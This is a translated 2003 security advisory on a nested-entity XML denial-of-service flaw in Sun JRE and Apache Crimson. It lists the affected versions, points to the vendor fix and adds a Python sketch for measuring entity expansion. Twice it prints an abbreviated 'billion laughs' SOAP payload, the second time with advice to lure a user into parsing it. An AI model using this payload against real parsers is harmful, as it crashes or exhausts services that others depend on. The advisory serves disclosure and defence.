Sun Java XML Document Nested Entity Denial of Service Vulnerability

Published: 2003-09-22
Updated: 2003-09-27

Affected systems:
Sun JRE (Linux Production Release) 1.4.1_03
Sun JRE (Linux Production Release) 1.4.1_02
Sun JRE (Linux Production Release) 1.4.1_01
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Linux Production Release) 1.4.0_03
Sun JRE (Linux Production Release) 1.4.0_02
Sun JRE (Linux Production Release) 1.4
Sun JRE (Linux Production Release) 1.3.1_06
Sun JRE (Linux Production Release) 1.3.1_05
Sun JRE (Linux Production Release) 1.3.1_03
Sun JRE (Linux Production Release) 1.3.1_02
Sun JRE (Linux Production Release) 1.3.1_01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.3.0_05
Sun JRE (Linux Production Release) 1.3.0_02
Sun JRE (Linux Production Release) 1.3.0
Sun JRE (Linux Production Release) 1.2.2_011
Sun JRE (Linux Production Release) 1.2.2_010
Sun JRE (Linux Production Release) 1.2.2_007
Sun JRE (Linux Production Release) 1.2.2_003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.4.1_03
Sun JRE (Solaris Production Release) 1.4.1_02
Sun JRE (Solaris Production Release) 1.4.1_01
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.4.0_03
Sun JRE (Solaris Production Release) 1.4
Sun JRE (Solaris Production Release) 1.3_05
Sun JRE (Solaris Production Release) 1.3.1_06
Sun JRE (Solaris Production Release) 1.3.1_05
Sun JRE (Solaris Production Release) 1.3.1_03
Sun JRE (Solaris Production Release) 1.3.1_02
Sun JRE (Solaris Production Release) 1.3.1_01
Sun JRE (Solaris Production Release) 1.3.0_02
Sun JRE (Solaris Production Release) 1.3
Sun JRE (Solaris Production Release) 1.2.2_11
Sun JRE (Solaris Production Release) 1.2.2_10
Sun JRE (Solaris Production Release) 1.2.2_07
Sun JRE (Solaris Production Release) 1.2.2_05a
Sun JRE (Solaris Production Release) 1.2.1
Sun JRE (Solaris Production Release) 1.2
Sun JRE (Solaris Production Release) 1.1.8_15
Sun JRE (Solaris Production Release) 1.1.8_14
Sun JRE (Solaris Production Release) 1.1.8_13
Sun JRE (Solaris Production Release) 1.1.8_10
Sun JRE (Solaris Production Release) 1.1.7B
Sun JRE (Windows Production Release) 1.4.1_03
Sun JRE (Windows Production Release) 1.4.1_02
Sun JRE (Windows Production Release) 1.4.1_01
Sun JRE (Windows Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.4.0_03
Sun JRE (Windows Production Release) 1.4
Sun JRE (Windows Production Release) 1.3_05
Sun JRE (Windows Production Release) 1.3.1_06
Sun JRE (Windows Production Release) 1.3.1_05
Sun JRE (Windows Production Release) 1.3.1_03
Sun JRE (Windows Production Release) 1.3.1_02
Sun JRE (Windows Production Release) 1.3.1_01a
Sun JRE (Windows Production Release) 1.3.0_02
Sun JRE (Windows Production Release) 1.3
Sun JRE (Windows Production Release) 1.2.2_011
Sun JRE (Windows Production Release) 1.2.2_010
Sun JRE (Windows Production Release) 1.2.2_007
Sun JRE (Windows Production Release) 1.2.1
Sun JRE (Windows Production Release) 1.2
Sun JRE (Windows Production Release) 1.1.8_009
Sun JRE (Windows Production Release) 1.1.8_008
Sun JRE (Windows Production Release) 1.1.8_007
Apache Software Foundation Crimson 1.0
Sun JRE (Linux Production Release) 1.2.2_005
    - Debian Linux 2.2
    - Mandrake Linux 7.2
    - RedHat Linux 7.0
    - SuSE Linux 7.0
Sun JRE (Solaris Production Release) 1.1.6
    - Sun Solaris 8.0
    - Sun Solaris 7.0
    - Sun Solaris 2.6
Unaffected systems:
Sun JRE (Linux Production Release) 1.4.2
Sun JRE (Solaris Production Release) 1.4.2
Sun JRE (Windows Production Release) 1.4.2
Apache Software Foundation Crimson 1.1
Description:
BUGTRAQ  ID: 8666

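Sun Java 2 SDK is an implementation of the Java platform.

Sun Java has a problem when processing specially crafted XML documents. A remote attacker can exploit this vulnerability by luring a user into accessing a malicious XML document, causing the system to crash.

XML does not allow recursive entity definitions, but it does allow nested entity definitions. When the XML data comes from an external source, this makes a denial of service attack possible. For example, a SOAP document like the following, which contains deeply nested entity definitions, can consume 100% of CPU time and a large amount of memory: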

<?xml version="1.0" encoding ="UTF-8"?>
<!DOCTYPE foobar[
<!ENTITY x100 "foobar">
<!ENTITY  x99 "&x100;&x100;">
<!ENTITY  x98 "&x99;&x99;">
...
<!ENTITY   x2 "&x3;&x3;">
<!ENTITY   x1 "&x2;&x2;">
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=...>
<SOAP-ENV:Body>
<ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="...">
<foobar xsi:type="xsd:string">&x1;</foobar>
</ns1:aaa>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

<*Source: Sun Release Notes
  
  Link: http://java.sun.com/j2se/1.4.2/relnotes.html#JAXP_security
*>
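
Why the nesting described above is so costly, as an added example (not part of the original advisory or of Sun's code): this Python sketch computes each entity's fully expanded length arithmetically, without expanding anything, and compares it with a budget. The function names, the 1,000,000-character budget and the sample declarations (constructed in the advisory's pattern) are assumptions for illustration; parameter and external entities are not handled.

```python
import re

# Internal general entity declarations: <!ENTITY name "value"> or 'value'
ENTITY_DECL = re.compile(r"""<!ENTITY\s+([\w.:-]+)\s+(?:"([^"]*)"|'([^']*)')\s*>""")
ENTITY_REF = re.compile(r"&([\w.:-]+);")
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}

def expanded_sizes(xml_text):
    """Map each declared entity to its fully expanded length in characters,
    computed arithmetically so nothing is ever expanded in memory."""
    decls = {}
    for name, dq, sq in ENTITY_DECL.findall(xml_text):
        decls.setdefault(name, dq or sq)  # the first declaration of a name is binding
    sizes = {}

    def size(name, path):
        if name in PREDEFINED:
            return 1
        if name in path:
            raise ValueError("recursive entity definition: " + name)
        if name not in decls:
            raise ValueError("undeclared entity: " + name)
        if name not in sizes:
            value = decls[name]
            literal = len(ENTITY_REF.sub("", value))  # text outside references
            refs = ENTITY_REF.findall(value)
            sizes[name] = literal + sum(size(r, path | {name}) for r in refs)
        return sizes[name]

    for name in decls:
        size(name, frozenset())
    return sizes

def check_budget(xml_text, max_chars=1_000_000):
    """Return (within_budget, largest_entity, its_expanded_size)."""
    sizes = expanded_sizes(xml_text)
    worst = max(sizes, key=sizes.get, default=None)
    n = sizes.get(worst, 0)
    return n <= max_chars, worst, n

# Constructed sample in the advisory's pattern (declarations only):
# x100 = "foobar", and every xN below it references xN+1 twice.
SAMPLE = '<!DOCTYPE foobar[\n<!ENTITY x100 "foobar">\n' + "".join(
    f'<!ENTITY x{n} "&x{n + 1};&x{n + 1};">\n' for n in range(99, 0, -1)
) + "]><foobar>&x1;</foobar>"

if __name__ == "__main__":
    ok, worst, n = check_budget(SAMPLE)
    print(f"within budget: {ok}; &{worst}; expands to {n} characters")
```

Each level doubles the size of the one below it, so a document of roughly a hundred short lines asks the parser for 6 × 2^99 characters of text.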

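Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!

Construct the following SOAP document and lure a user into parsing it: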

<?xml version="1.0" encoding ="UTF-8"?>
<!DOCTYPE foobar[
<!ENTITY x100 "foobar">
<!ENTITY  x99 "&x100;&x100;">
<!ENTITY  x98 "&x99;&x99;">
...
<!ENTITY   x2 "&x3;&x3;">
<!ENTITY   x1 "&x2;&x2;">
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=...>
<SOAP-ENV:Body>
<ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="...">
<foobar xsi:type="xsd:string">&x1;</foobar>
</ns1:aaa>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Recommendations:
Vendor patch:

Sun
---
The vendor has released an upgrade patch that fixes this security issue. Download and use Java 2 SDK, Standard Edition from the vendor's home page:

http://java.sun.com/j2se/1.4.2/relnotes.html

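This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.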